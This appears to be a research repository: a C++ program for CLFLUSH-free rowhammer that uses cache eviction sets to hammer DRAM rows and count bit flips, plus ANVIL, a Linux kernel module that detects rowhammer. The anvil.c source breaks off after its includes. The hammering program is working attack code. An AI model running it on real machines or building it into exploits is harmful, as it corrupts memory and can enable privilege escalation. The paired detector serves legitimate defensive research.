├── anvil
    ├── anvil.png
    ├── Makefile
    ├── README
    ├── README~
    ├── anvil.h
    └── anvil.c
├── README.md
└── CLFLUSH-free_rowhammer.cpp


/anvil/anvil.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zaweke/rowhammer/HEAD/anvil/anvil.png


--------------------------------------------------------------------------------
/anvil/Makefile:
--------------------------------------------------------------------------------
1 | 
2 | obj-m += anvil.o
3 | 
4 | all:
5 | 	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
6 | 
7 | clean:
8 | 	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
9 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CLFLUSH-free rowhammer
 2 | 
 3 | This is an implementation of the CLFLUSH-free rowhammering attack. 
 4 | The directory 'anvil' contains code and README for ANVIL.
 5 | 
 6 | To compile and run the CLFLUSH-free rowhammering program:
 7 | 
 8 | $ g++ -std=c++11 -o CLFLUSH-free_rowhammer CLFLUSH-free_rowhammer.cpp
 9 | 
10 | $ sudo ./CLFLUSH-free_rowhammer
11 | 


--------------------------------------------------------------------------------
/anvil/README:
--------------------------------------------------------------------------------
 1 | ANVIL uses Intel performance counters to detect rowhammer activity
 2 | and protect potential victim rows by selectively reading from them.
 3 | The process of detecting rowhammering activity is depecited on the flowchart
 4 | (anvil.png).
 5 | 
 6 | ANVIL is implemented as a linux loadable kernel module. It has been tested
 7 | on an Intel Sandy Bridge machine with Ubuntu 14.02 LTS with linux version
 8 | 4.0.0. It should work with any Intel processor with Sandy Bridge and later
 9 | microarchitectures. 
10 | 
11 | Configuration 
12 | ==============
13 | 
14 | There are a number of parameters that can be tuned. The values of the 
15 | parameters affect accuracy of rowhammer detection and the performance overhead
16 | on non-hammering applications. All parameters are defined in "anvil.h". Below
17 | is a description of some of the most important parameters:
18 | 
19 | count_timer_period : This value is "tc" on the flow chart. It specifies the 
20 | time period to count the number of last-level cache misses in the first stage 
21 | of detection. It is given in nanoseconds. The default value is 6ms. It can be 
22 | lowered for faster detection of rowhammering activity.
23 | 
24 | sample_timer_period: This value is "ts" on the flow chart. It specifies the time
25 | period during which load and store samples are taken. It is given in nanoseconds.
26 | The default value is 6ms. It can be lowered for faster detection of rowhammering 
27 | activity. If this value is lowered, then the store and load sampling rates might 
28 | need to be increased to get enough samples.
29 | 
30 | LLC_MISS_THRESHOLD: Last-level cache miss threshold. If the LLC miss count for a 
31 | period of "tc" is greater than this value, then sampling of addresses is triggered. 
32 | Lowering this value increases accuracy of detection but increases the frequency of 
33 | sampling which affects performance of non-hammering applictions.
34 | 
35 | LD_LAT_SAMPLE_PERIOD: This value controls sampling rate of loads. Lowering this value 
36 | increases the number of load samples within the sampling period. A very low value 
37 | stresses the system as more interrupts are generated as the sampling rate increases.
38 | 
39 | PRE_STR_SAMPLE_PERIOD: This value controls sampling rate of stores. Lowering this value 
40 | increases the number of store samples within the sampling period. A very low value 
41 | stresses the system as more interrupts are generated as the sampling rate increases.
42 | Note that this value is much higher than LD_LAT_SAMPLE_PERIOD. This is because the 
43 | precise store event samples any stores (those that missed the last-level cache or not).
44 | Wheter the sample is LLC store miss is checked by software.
45 | 
46 | Building and Running
47 | ======================
48 | 
49 | To build the module:
50 | $make
51 | 
52 | anvil.ko file is produced from the build
53 | 
54 | To insert the module:
55 | $insmod anvil.ko
56 | 
57 | To remove the module:
58 | $rmmod anvil.ko
59 | 
60 | Compatability
61 | ================
62 | The module is tested on Intel Sandy Bridge. For later microarchitectures the following event
63 | number values in "anvil.h" might need to be changed according to the microarchitecture.
64 | These values can be found on Intel® 64 and IA-32 Architectures Software Developer’s Manual.
65 | 
66 | LOAD_LATENCY_EVENT
67 | PRECISE_STORE_EVENT
68 | MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS
69 | 
70 | 
71 | On some machines the sampling facility (PEBS) might require a micro-code upgrade. This can be 
72 | accomplished by running the following command (for ubuntu).
73 | 
74 | $sudo apt-get install intel-microcode
75 | 
76 | 
77 | 
78 | 
79 |  
80 | 


--------------------------------------------------------------------------------
/anvil/README~:
--------------------------------------------------------------------------------
 1 | ANVIL uses Intel performance counters to detect rowhammer activity
 2 | and protect potential victim rows by selectively reading from them.
 3 | The process of detecting rowhammering activity is depecited on the flowchart
 4 | (figure1.png).
 5 | 
 6 | ANVIL is implemented as a linux loadable kernel module. It has been tested
 7 | on an Intel Sandy Bridge machine with Ubuntu 14.02 LTS with linux version
 8 | 4.0.0. It should work with any Intel processor with Sandy Bridge and later
 9 | microarchitectures. 
10 | 
11 | Configuration 
12 | ==============
13 | 
14 | There are a number of parameters that can be tuned to . The values of the 
15 | parameters affect accuracy of rowhammer detection and the performance overhead
16 | on non-hammering applications. All parameters are defined in "anvil.h". Below
17 | is a description of some of the most important parameters:
18 | 
19 | count_timer_period : This value is "tc" on the flow chart. It specifies the 
20 | time period to count the number of last-level cache misses in the first stage 
21 | of detection. It is given in nanoseconds. The default value is 6ms. It can be 
22 | lowered for faster detection of rowhammering activity.
23 | 
24 | sample_timer_period: This value is "ts" on the flow chart. It specifies the time
25 | period during which load and store samples are taken. It is given in nanoseconds.
26 | The default value is 6ms. It can be lowered for faster detection of rowhammering 
27 | activity. If this value is lowered, then the store and load sampling rates might 
28 | need to be increased to get enough samples.
29 | 
30 | LLC_MISS_THRESHOLD: Last-level cache miss threshold. If the LLC miss count for a 
31 | period of "tc" is greater than this value, then sampling of addresses is triggered. 
32 | Lowering this value increases accuracy of detection but increases the frequency of 
33 | sampling which affects performance of non-hammering applictions.
34 | 
35 | LD_LAT_SAMPLE_PERIOD: This value controls sampling rate of loads. Lowering this value 
36 | increases the number of load samples within the sampling period. A very low value 
37 | stresses the system as more interrupts are generated as the sampling rate increases.
38 | 
39 | PRE_STR_SAMPLE_PERIOD: This value controls sampling rate of stores. Lowering this value 
40 | increases the number of store samples within the sampling period. A very low value 
41 | stresses the system as more interrupts are generated as the sampling rate increases.
42 | Note that this value is much higher than LD_LAT_SAMPLE_PERIOD. This is because the 
43 | precise store event samples any stores (those that missed the last-level cache or not).
44 | Wheter the sample is LLC store miss is checked by software.
45 | 
46 | Building and Running
47 | ======================
48 | 
49 | To build the module:
50 | $make
51 | 
52 | anvil.ko file is produced from the build
53 | 
54 | To insert the module:
55 | $insmod anvil.ko
56 | 
57 | To remove the module:
58 | $rmmod anvil.ko
59 | 
60 | Compatability
61 | ================
62 | The module is tested on Intel Sandy Bridge. For later microarchitectures the following event
63 | number values in "anvil.h" might need to be changed according to the microarchitecture.
64 | These values can be found on Intel® 64 and IA-32 Architectures Software Developer’s Manual.
65 | 
66 | LOAD_LATENCY_EVENT
67 | PRECISE_STORE_EVENT
68 | MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS
69 | 
70 | 
71 | On some machines the sampling facility (PEBS) might require a micro-code upgrade. This can be 
72 | accomplished by running the following command (for ubuntu).
73 | 
74 | $sudo apt-get install intel-microcode
75 | 
76 | 
77 | 
78 | 
79 |  
80 | 


--------------------------------------------------------------------------------
/anvil/anvil.h:
--------------------------------------------------------------------------------
  1 | 
  2 | #include <linux/perf_event.h>
  3 | 
  4 | 
  5 | #define LOAD_LATENCY_EVENT 0x01CD
  6 | #define PRECISE_STORE_EVENT 0x02CD
  7 | #define MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS 0x02D4
  8 | 
  9 | /* controls load sampling rate */
 10 | #define LD_LAT_SAMPLE_PERIOD 50		
 11 | 
 12 | /* controls store sampling rate */
 13 | #define PRE_STR_SAMPLE_PERIOD 3000
 14 | 
 15 | /* count period in nanoseconds */
 16 | #define count_timer_period 6000000 	
 17 | 
 18 | /* sample period  in nanoseconds */
 19 | #define sample_timer_period 6000000 					
 20 | 
 21 | /* last-level cache miss rate threshold
 22 | 			that triggers sampling            */
 23 | #define LLC_MISS_THRESHOLD			20000
 24 | 
 25 | /* Maximum number of addresses in the address profile */
 26 | #define PROFILE_N 20
 27 | 
 28 | /* Maximum number of samples */
 29 | #define SAMPLES_MAX 150
 30 | 
 31 | /* LLC miss event attribute */
 32 | static struct perf_event_attr llc_miss_event = {
 33 |     .type = PERF_TYPE_HARDWARE,
 34 |     .config = PERF_COUNT_HW_CACHE_MISSES,    
 35 |     .exclude_user  	= 0,      
 36 |     .exclude_kernel = 1,        
 37 | 				.pinned = 1,
 38 | };
 39 | 
 40 | /* Load uops that misses LLC */
 41 | static struct perf_event_attr l1D_miss_event = {
 42 |     .type =  PERF_TYPE_RAW,
 43 |     .config = MEM_LOAD_UOPS_MISC_RETIRED_LLC_MISS,    
 44 |     .exclude_user  	= 0,       
 45 |     .exclude_kernel = 1,        
 46 | 				.pinned = 1,
 47 | };
 48 | 
 49 | 
 50 | /* Load latency event attribute */
 51 | static struct perf_event_attr load_latency_event = {
 52 |     .type = PERF_TYPE_RAW,
 53 |     .config = LOAD_LATENCY_EVENT, 
 54 | 				.config1 = 150, //latency?   
 55 | 				.sample_type = 
 56 | 																			PERF_SAMPLE_ADDR 				|			//Sample address
 57 | 																			PERF_SAMPLE_DATA_SRC | 		//Sample data source 
 58 | 																			PERF_SAMPLE_WEIGHT,						//Sample latency in clock cycles
 59 | 				.sample_period = 	LD_LAT_SAMPLE_PERIOD, //How many samples before overflow(interrupt)
 60 |     .exclude_user  = 0,        													//count user
 61 |     .exclude_kernel = 1,        												//don't count kernel
 62 | 				.precise_ip 				= 1,																				// Enables precise event
 63 | 				.wakeup_events 	= 1,																				//overflow on each sample
 64 | 				.disabled = 1,
 65 | 				.pinned = 1,
 66 | };
 67 | 
 68 | /*precise store event*/
 69 | static struct perf_event_attr precise_str_event_attr = {
 70 |     .type = PERF_TYPE_RAW,
 71 |     .config = PRECISE_STORE_EVENT,   
 72 | 				.sample_type =
 73 | 																			PERF_SAMPLE_ADDR 				|		
 74 | 																			PERF_SAMPLE_DATA_SRC , 	
 75 | 																		
 76 | 				.sample_period = 	PRE_STR_SAMPLE_PERIOD, 
 77 |     .exclude_user   = 0,        						
 78 |     .exclude_kernel = 1,        												
 79 | 				.precise_ip 				= 1,																				
 80 | 				.wakeup_events 	= 1,
 81 | 				.disabled 						= 1,
 82 | 				.pinned 								= 1,
 83 | };
 84 | 
 85 | /* Address profile */
 86 | typedef struct{
 87 | 	unsigned long phy_page;
 88 | 	unsigned long page;
 89 | 	int ld_st;
 90 | 	unsigned long llc_total_miss;
 91 | 	unsigned int llc_percent_miss;
 92 | 	int cpu;
 93 | unsigned long dummy1;
 94 | unsigned long dummy2;
 95 | int hammer;
 96 | } profile_t;
 97 | 
 98 | /* Address sample */
 99 | typedef struct{
100 | 	unsigned long phy_page;
101 | 	u64 addr;
102 | 	u64 lat;
103 | 	u64 time;
104 | 	unsigned int src;
105 | 	int ld_st;//sample is load or store
106 | 	int cpu;
107 | }sample_t;
108 | 
109 | /* for logging */
110 | struct sample_log{
111 | 	profile_t profile[20];
112 | 	unsigned int record_size;
113 | 	unsigned int sample_total;
114 | 	unsigned int hammer_threshold;
115 | 	int cpu;
116 | };
117 | 
118 | 
119 | 


--------------------------------------------------------------------------------
/CLFLUSH-free_rowhammer.cpp:
--------------------------------------------------------------------------------
  1 | /***************************************************************
  2 | A program to test CLFLUSH-free rowhammering
  3 | 
  4 | The program is based on the double-sided rowhammring 
  5 | program at https://github.com/google/rowhammer-test/
  6 | 
  7 | **************************************************************/
  8 | 
  9 | 
 10 | // Copyright 2015, Google, Inc.
 11 | //
 12 | // Licensed under the Apache License, Version 2.0 (the "License");
 13 | // you may not use this file except in compliance with the License.
 14 | // You may obtain a copy of the License at
 15 | //
 16 | //     http://www.apache.org/licenses/LICENSE-2.0
 17 | //
 18 | // Unless required by applicable law or agreed to in writing, software
 19 | // distributed under the License is distributed on an "AS IS" BASIS,
 20 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 21 | // See the License for the specific language governing permissions and
 22 | // limitations under the License.
 23 | 
 24 | // Small test program to systematically check through the memory to find bit
 25 | // flips by double-sided row hammering.
 26 | //
 27 | // Compilation instructions:
 28 | //   g++ -std=c++11 [filename]
 29 | //
 30 | // ./double_sided_rowhammer [-t nsecs] [-p percentage]
 31 | //
 32 | // Hammers for nsecs seconds, acquires the described fraction of memory (0.0
 33 | // to 0.9 or so).
 34 | 
 35 | #include <asm/unistd.h>
 36 | #include <assert.h>
 37 | #include <errno.h>
 38 | #include <fcntl.h>
 39 | #include <inttypes.h>
 40 | #include <linux/kernel-page-flags.h>
 41 | #include <map>
 42 | #include <stdint.h>
 43 | #include <stdio.h>
 44 | #include <stdlib.h>
 45 | #include <string>
 46 | #include <string.h>
 47 | #include <sys/ioctl.h>
 48 | #include <sys/mount.h>
 49 | #include <sys/mman.h>
 50 | #include <sys/stat.h>
 51 | #include <sys/sysinfo.h>
 52 | #include <sys/wait.h>
 53 | #include <time.h>
 54 | #include <unistd.h>
 55 | #include <vector>
 56 | #include <algorithm>
 57 | #include <pthread.h>
 58 | 
 59 | #define DEBUG
 60 | 
 61 | #define TOTAL_ACCESS (1024*1000)/14
 62 | #define INDEX_SIZE 210
 63 | 
 64 | 
 65 | int dummy,dummy2;
 66 | // The fraction of physical memory that should be mapped for testing.
 67 | double fraction_of_physical_memory = 0.3;
 68 | 
 69 | // The time to hammer before aborting. Defaults to one hour.
 70 | uint64_t number_of_seconds_to_hammer = 3600;
 71 | 
 72 | // The number of memory reads to try.
 73 | uint64_t number_of_reads = 1000*1024;
 74 | 
 75 | int pagemap;
 76 | uintptr_t end_addr;
 77 | const int size = 13;
 78 | const int addr_count = 22;
 79 | 
 80 | volatile  uintptr_t first_addrs[size];
 81 | volatile  uintptr_t second_addrs[size];	
 82 | uintptr_t phy_addr1[size];
 83 | uintptr_t phy_addr2[size];
 84 | 
 85 | // Indexes of conflicting addresses in the access patern 
 86 | volatile  int indexes1[]={0,1,2,3,4,5,6,7,8,9,10,
 87 | 													12,1,2,3,4,5,6,7,8,9,11};
 88 | 
 89 | volatile int indexes2[]={0,1,2,3,4,5,6,7,8,9,10,
 90 | 													12,1,2,3,4,5,6,7,8,9,11};
 91 | 
 92 | // Obtain the size of the physical memory of the system.
 93 | uint64_t GetPhysicalMemorySize() {
 94 |   struct sysinfo info;
 95 |   sysinfo( &info );
 96 |   return (size_t)info.totalram * (size_t)info.mem_unit;
 97 | }
 98 | 
 99 | // If physical_address is in the range, put (physical_address, virtual_address)
100 | // into the map.
101 | bool PutPointerIfInAddressRange(const std::pair<uint64_t, uint64_t>& range,
102 |     uint64_t physical_address, uint8_t* virtual_address,
103 |     std::map<uint64_t, uint8_t*>& pointers) {
104 |   if (physical_address >= range.first && physical_address <= range.second) {
105 |     printf("[!] Found desired physical address %lx at virtual %lx\n", 
106 |         (uint64_t)physical_address, (uint64_t)virtual_address);
107 |     pointers[physical_address] = virtual_address;
108 |     return true;
109 |   }
110 |   return false;
111 | }
112 | 
113 | bool IsRangeInMap(const std::pair<uint64_t, uint64_t>& range,
114 |     const std::map<uint64_t, uint8_t*>& mapping) {
115 |   for (uint64_t check = range.first; check <= range.second; check += 0x1000) {
116 |     if (mapping.find(check) == mapping.end()) {
117 |       printf("[!] Failed to find physical memory at %lx\n", check);
118 |       return false;
119 |     }
120 |   }
121 |   return true;
122 | }
123 | 
124 | uint64_t GetPageFrameNumber(int pagemap, uint8_t* virtual_address) {
125 |   // Read the entry in the pagemap.
126 |   uint64_t value;
127 |   int got = pread(pagemap, &value, 8,
128 |                   (reinterpret_cast<uintptr_t>(virtual_address) / 0x1000) * 8);
129 |   assert(got == 8);
130 |   uint64_t page_frame_number = value & ((1ULL << 54)-1);
131 |   return page_frame_number;
132 | }
133 | 
134 | void SetupMapping(size_t* mapping_size, void** mapping) {
135 |     *mapping_size = 
136 |     static_cast<uint64_t>((static_cast<double>(GetPhysicalMemorySize()) * 
137 |           fraction_of_physical_memory));
138 | 
139 |   *mapping = mmap(NULL, *mapping_size, PROT_READ | PROT_WRITE,
140 |       MAP_POPULATE | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
141 |   assert(*mapping != (void*)-1);
142 | 
143 | 	end_addr = (uintptr_t)((uintptr_t)*mapping + *mapping_size);
144 |   // Initialize the mapping so that the pages are non-empty.
145 |   printf("[!] Initializing large memory mapping ...");
146 |   for (uint64_t index = 0; index < *mapping_size; index += 0x1000) {
147 |     uint64_t* temporary = reinterpret_cast<uint64_t*>(
148 |         static_cast<uint8_t*>(*mapping) + index);
149 |     temporary[0] = index;
150 |   }
151 |   printf("done\n");
152 | }
153 | 
154 | 
155 | int get_cache_slice(uint64_t phys_addr, int bad_bit) {
156 |   // On a 4-core machine, the CPU's hash function produces a 2-bit
157 |   // cache slice number, where the two bits are defined by "h1" and
158 |   // "h2":
159 |   //
160 |   // h1 function:
161 |   //   static const int bits[] = { 18, 19, 21, 23, 25, 27, 29, 30, 31 };
162 |   // h2 function:
163 |   //   static const int bits[] = { 17, 19, 20, 21, 22, 23, 24, 26, 28, 29, 31 };
164 |   //
165 |   // This hash function is described in the paper "Practical Timing
166 |   // Side Channel Attacks Against Kernel Space ASLR".
167 |   //
168 |   // On a 2-core machine, the CPU's hash function produces a 1-bit
169 |   // cache slice number which appears to be the XOR of h1 and h2.
170 | 
171 |   // XOR of h1 and h2:
172 |   static const int bits[] = { 17, 18, 20, 22, 24, 25, 26, 27, 28, 30 };
173 | 
174 |   int count = sizeof(bits) / sizeof(bits[0]);
175 |   int hash = 0;
176 |   for (int i = 0; i < count; i++) {
177 |     hash ^= (phys_addr >> bits[i]) & 1;
178 |   }
179 |   if (bad_bit != -1) {
180 |     hash ^= (phys_addr >> bad_bit) & 1;
181 |   }
182 |   return hash;
183 | }
184 | 
185 | // Extract the physical page number from a Linux /proc/PID/pagemap entry.
186 | uint64_t frame_number_from_pagemap(uint64_t value) {
187 |   return value & ((1ULL << 54) - 1);
188 | }
189 | 
190 | uint64_t get_physical_addr(uintptr_t virtual_addr) {
191 |   uint64_t value;
192 | 		const int page_size = 0x1000;
193 |   off_t offset = (virtual_addr / page_size) * sizeof(value);
194 |   int got = pread(pagemap, &value, sizeof(value), offset);
195 | 		if(got!=8)
196 | 		return 0;
197 |  		assert(got == 8);
198 | 
199 |   //Check the "page present" flag.
200 |   	assert(value & (1ULL << 63));
201 | 		if(!(value & (1ULL << 63)))
202 | 			return 0;
203 | 
204 |   uint64_t frame_num = frame_number_from_pagemap(value);
205 |   return (frame_num * page_size) | (virtual_addr & (page_size - 1));
206 | }
207 | 
208 | //checks if two addresses map to the same cache line
209 | bool in_same_cache_set(uint64_t phys1, uint64_t phys2, int bad_bit) {
210 |   // For Sandy Bridge, the bottom 17 bits determine the cache set
211 |   // within the cache slice (or the location within a cache line).
212 |   uint64_t mask = ((uint64_t) 1 << 17) - 1;
213 |   return ((phys1 & mask) == (phys2 & mask) &&
214 |           get_cache_slice(phys1, bad_bit) == get_cache_slice(phys2, bad_bit));
215 | }
216 | 
217 | inline void mfence() {
218 |   asm volatile("mfence");
219 | }
220 | 
221 | //Measure the time taken to access the given address, in nanoseconds.
222 | int time_access(uintptr_t ptr) {
223 |   struct timespec ts0;
224 |   int rc = clock_gettime(CLOCK_MONOTONIC, &ts0);
225 |   assert(rc == 0);
226 | 
227 |   dummy += *(volatile int *) ptr;
228 |   mfence();
229 | 
230 |   struct timespec ts;
231 |   rc = clock_gettime(CLOCK_MONOTONIC, &ts);
232 |   assert(rc == 0);
233 |   return (ts.tv_sec - ts0.tv_sec) * 1000000000
234 |          + (ts.tv_nsec - ts0.tv_nsec);
235 | }
236 | 
237 | 
238 | int timing(volatile uintptr_t* addrs,int addr_count, int bad_bit) {
239 |   // Time memory accesses.
240 |   int runs = 10;
241 |   int times[runs];
242 |   for (int run = 0; run < runs; run++) {
243 |     // Ensure the first address is cached by accessing it.
244 |     dummy += *(volatile int *) addrs[0];
245 |     mfence();
246 |     // Now pull the other addresses through the cache too.
247 |     for (int i = 1; i < addr_count; i++) {
248 |       dummy += *(volatile int *) addrs[i];
249 |     }
250 |     mfence();
251 |     // See whether the first address got evicted from the cache by
252 |     // timing accessing it.
253 |     times[run] = time_access(addrs[0]);
254 |   }
255 | 
256 | // Find the median time.  We use the median in order to discard
257 |   // outliers.  We want to discard outlying slow results which are
258 |   // likely to be the result of other activity on the machine.
259 |   //
260 |   // We also want to discard outliers where memory was accessed
261 |   // unusually quickly.  These could be the result of the CPU's
262 |  // eviction policy not using an exact LRU policy.
263 |   std::sort(times, &times[runs]);
264 |   int median_time = times[runs / 2];
265 | 
266 |   return median_time;
267 | }
268 | 
269 | 
270 | int timing_mean(volatile uintptr_t* addrs, int addr_count, int bad_bit) {
271 |   int runs = 10;
272 |   int sum_time = 0;
273 |   for (int i = 0; i < runs; i++)
274 |     sum_time += timing(addrs, addr_count, bad_bit);
275 |   return sum_time / runs;
276 | }
277 | 
278 | // get conflicting addresses 									
279 | // returns virtual and physical addresses	
280 | // for the eviction set		
281 | 
282 | int get_conflicting_address(uintptr_t start_addr, int addr_count,volatile uintptr_t *addrs, uintptr_t *phy_addrs) {
283 |   const int page_size = 0x1000;
284 |   uintptr_t phys1,phys2;
285 | 
286 |   addrs[0] = start_addr;
287 |   phys1 = get_physical_addr(addrs[0]);
288 |   phy_addrs[0] = phys1;
289 | 
290 |   uintptr_t next_addr = start_addr;
291 |   int found = 1;
292 |   while ((found < addr_count)) {
293 | 		if(next_addr >= end_addr)
294 | 			return 0;
295 | 
296 |     assert(next_addr < end_addr);//make sure it is with in boundary
297 |     //uintptr_t addr = next_addr;
298 |     next_addr += page_size;
299 |     phys2 = get_physical_addr( next_addr);
300 |     if (in_same_cache_set(phys1, phys2, -1)){// && (bank == bank1) && (rank == rank1)) {
301 |       addrs[found] =  next_addr; 
302 |       phy_addrs[found] = phys2;
303 |       found++;
304 |     }
305 |   }
306 |    
307 | 	return 1;
308 | }
309 | 
310 | 
311 | uint64_t HammerAddressesStandard(
312 |     const std::pair<uint64_t, uint64_t>& first_range,
313 |     const std::pair<uint64_t, uint64_t>& second_range,
314 |     uint64_t number_of_reads, uint8_t* target_page) {
315 |   volatile uint64_t* first_pointer =
316 |       reinterpret_cast<uint64_t*>(first_range.first);
317 |   volatile uint64_t* second_pointer =
318 |       reinterpret_cast<uint64_t*>(second_range.first);
319 | struct timespec ts0,ts;
320 | 
321 |   
322 | 	// Get conflicting addresses (eviction set)
323 | 	while(!get_conflicting_address((uintptr_t)first_pointer, size, first_addrs,phy_addr1));	
324 | 	while(!get_conflicting_address((uintptr_t)second_pointer, size, second_addrs,phy_addr2));
325 | 
326 | 		// Do several trials
327 | 		printf("~~~~~~~~~~~~~~~~~~~~~~\n");
328 | 	for(int trial=0;trial<10;trial++){
329 | 		// Get start time
330 | 	 int rc = clock_gettime(CLOCK_MONOTONIC, &ts0);
331 |          assert(rc == 0);
332 | 
333 | 	// Hammer using eviction set
334 | 	for(int k=0;k<number_of_reads;k++){
335 | 			for(int j=0;j<addr_count;j++){
336 | 					dummy += *(volatile uintptr_t*)first_addrs[indexes1[j]];
337 | 					dummy2 += *(volatile uintptr_t*)second_addrs[indexes2[j]];
338 | 			}
339 | 	}
340 | 
341 | 	rc = clock_gettime(CLOCK_MONOTONIC, &ts);
342 |  assert(rc == 0);
343 | 	int total_time = (ts.tv_sec - ts0.tv_sec) * 1000000000
344 |          + (ts.tv_nsec - ts0.tv_nsec);
345 | 	total_time/=number_of_reads;
346 | 
347 | 	// Time per reads
348 | 	printf("Average time = %d ns\n",total_time);
349 | }
350 | 
351 | return 0;
352 | }
353 | 
354 | typedef uint64_t(HammerFunction)(
355 |     const std::pair<uint64_t, uint64_t>& first_range,
356 |     const std::pair<uint64_t, uint64_t>& second_range,
357 |     uint64_t number_of_reads, uint8_t* target_add);
358 | 
359 | // A comprehensive test that attempts to hammer adjacent rows for a given 
360 | // assumed row size (and assumptions of sequential physical addresses for 
361 | // various rows.
362 | uint64_t HammerAllReachablePages(uint64_t presumed_row_size, 
363 |     void* memory_mapping, uint64_t memory_mapping_size, HammerFunction* hammer,
364 |     uint64_t number_of_reads) {
365 |   // This vector will be filled with all the pages we can get access to for a
366 |   // given row size.
367 |   std::vector<std::vector<uint8_t*>> pages_per_row;
368 |   uint64_t total_bitflips = 0;
369 | 		uint8_t* target_add=NULL;
370 | 
371 |   pages_per_row.resize(memory_mapping_size / presumed_row_size);
372 |   pagemap = open("/proc/self/pagemap", O_RDONLY);
373 |   assert(pagemap >= 0);
374 | 
375 |   printf("[!] Identifying rows for accessible pages ... ");
376 |   for (uint64_t offset = 0; offset < memory_mapping_size; offset += 0x1000) {
377 |     uint8_t* virtual_address = static_cast<uint8_t*>(memory_mapping) + offset;
378 |     uint64_t page_frame_number = GetPageFrameNumber(pagemap, virtual_address);
379 |     uint64_t physical_address = page_frame_number * 0x1000;
380 |     uint64_t presumed_row_index = physical_address / presumed_row_size;
381 |     //printf("[!] put va %lx pa %lx into row %ld\n", (uint64_t)virtual_address,
382 |     //    physical_address, presumed_row_index);
383 |     if (presumed_row_index > pages_per_row.size()) {
384 |       pages_per_row.resize(presumed_row_index);
385 |     }
386 |     pages_per_row[presumed_row_index].push_back(virtual_address);
387 |     //printf("[!] done\n");
388 |   }
389 |   printf("Done\n");
390 | 
391 |   // We should have some pages for most rows now.
392 |   for (uint64_t row_index = 0; row_index + 2 < pages_per_row.size(); 
393 |       ++row_index) {
394 |     if ((pages_per_row[row_index].size() != 64) || 
395 |         (pages_per_row[row_index+2].size() != 64)) {
396 |       printf("[!] Can't hammer row %ld - only got %ld/%ld pages "
397 |           "in the rows above/below\n",
398 |           row_index+1, pages_per_row[row_index].size(), 
399 |           pages_per_row[row_index+2].size());
400 |       continue;
401 |     } else if (pages_per_row[row_index+1].size() == 0) {
402 |       printf("[!] Can't hammer row %ld, got no pages from that row\n", 
403 |           row_index+1);
404 |       continue;
405 |     }
406 |     printf("[!] Hammering rows %ld/%ld/%ld of %ld (got %ld/%ld/%ld pages)\n", 
407 |         row_index, row_index+1, row_index+2, pages_per_row.size(), 
408 |         pages_per_row[row_index].size(), pages_per_row[row_index+1].size(), 
409 |         pages_per_row[row_index+2].size());
410 |     // Iterate over all pages we have for the first row.
411 |     for (uint8_t* first_row_page : pages_per_row[row_index]) {
412 |       // Iterate over all pages we have for the second row.
413 |     for (uint8_t* second_row_page : pages_per_row[row_index+2]) {
414 |         // Set all the target pages to 0xFF.
415 |         for (uint8_t* target_page : pages_per_row[row_index+1]) {
416 |           memset(target_page, 0xFF, 0x1000);
417 | 										target_add = target_page;
418 |         }
419 |         // Now ,target_pagehammer the two pages we care about.
420 |         std::pair<uint64_t, uint64_t> first_page_range(
421 |             reinterpret_cast<uint64_t>(first_row_page), 
422 |             reinterpret_cast<uint64_t>(first_row_page+0x1000));
423 |         std::pair<uint64_t, uint64_t> second_page_range(
424 |             reinterpret_cast<uint64_t>(second_row_page),
425 |             reinterpret_cast<uint64_t>(second_row_page+0x1000));
426 |         hammer(first_page_range, second_page_range, number_of_reads,target_add);
427 |         // Now check the target pages.
428 |         uint64_t number_of_bitflips_in_target = 0;
429 |         for (const uint8_t* target_page : pages_per_row[row_index+1]) {
430 |           for (uint32_t index = 0; index < 0x1000; ++index) {
431 |             if (target_page[index] != 0xFF) {
432 |               ++number_of_bitflips_in_target;
433 |             }
434 |           }
435 |         }
436 |         if (number_of_bitflips_in_target > 0) {
437 |           printf("[!] Found %ld flips in row %ld (%lx to %lx) when hammering "
438 |               "%lx and %lx\n", number_of_bitflips_in_target, row_index+1,
439 |               ((row_index+1)*presumed_row_size), 
440 |               ((row_index+2)*presumed_row_size)-1,
441 |               GetPageFrameNumber(pagemap, first_row_page)*0x1000, 
442 |               GetPageFrameNumber(pagemap, second_row_page)*0x1000);
443 |           total_bitflips += number_of_bitflips_in_target;
444 |         }
445 |       }
446 |     }
447 |   }
448 |   return total_bitflips;
449 | }
450 | 
451 | void HammerAllReachableRows(HammerFunction* hammer, uint64_t number_of_reads) {
452 |   size_t mapping_size;
453 |   void* mapping;
454 |   SetupMapping(&mapping_size, &mapping);
455 | 
456 |   HammerAllReachablePages(1024*256, mapping, mapping_size,
457 |                           hammer, number_of_reads);
458 | }
459 | 
460 | void HammeredEnough(int sig) {
461 |   printf("[!] Spent %ld seconds hammering, exiting now.\n",
462 |       number_of_seconds_to_hammer);
463 |   fflush(stdout);
464 |   fflush(stderr);
465 |   exit(0);
466 | }
467 | 
468 | int main(int argc, char** argv) {
469 |   // Turn off stdout buffering when it is a pipe.
470 |   setvbuf(stdout, NULL, _IONBF, 0);
471 | 
472 |   int opt;
473 |   while ((opt = getopt(argc, argv, "t:p:")) != -1) {
474 |     switch (opt) {
475 |       case 't':
476 |         number_of_seconds_to_hammer = atoi(optarg);
477 |         break;
478 |       case 'p':
479 |         fraction_of_physical_memory = atof(optarg);
480 |         break;
481 |       default:
482 |         fprintf(stderr, "Usage: %s [-t nsecs] [-p percent]\n", 
483 |             argv[0]);
484 |         exit(EXIT_FAILURE);
485 |     }
486 |   }
487 | 
488 |   signal(SIGALRM, HammeredEnough);
489 | 
490 |   printf("[!] Starting the testing process...\n");
491 |   alarm(number_of_seconds_to_hammer);
492 |   HammerAllReachableRows(&HammerAddressesStandard, number_of_reads);
493 | }
494 | 
495 | 


--------------------------------------------------------------------------------
/anvil/anvil.c:
--------------------------------------------------------------------------------
  1 | #define DEBUG
  2 | 
  3 | #include <linux/kernel.h>
  4 | #include <linux/module.h>
  5 | #include <linux/perf_event.h>
  6 | #include <linux/cpumask.h> 
  7 | #include <linux/slab.h> 
  8 | #include <linux/interrupt.h>
  9 | #include <linux/workqueue.h>
 10 | #include <linux/hrtimer.h>
 11 | #include <linux/ktime.h>
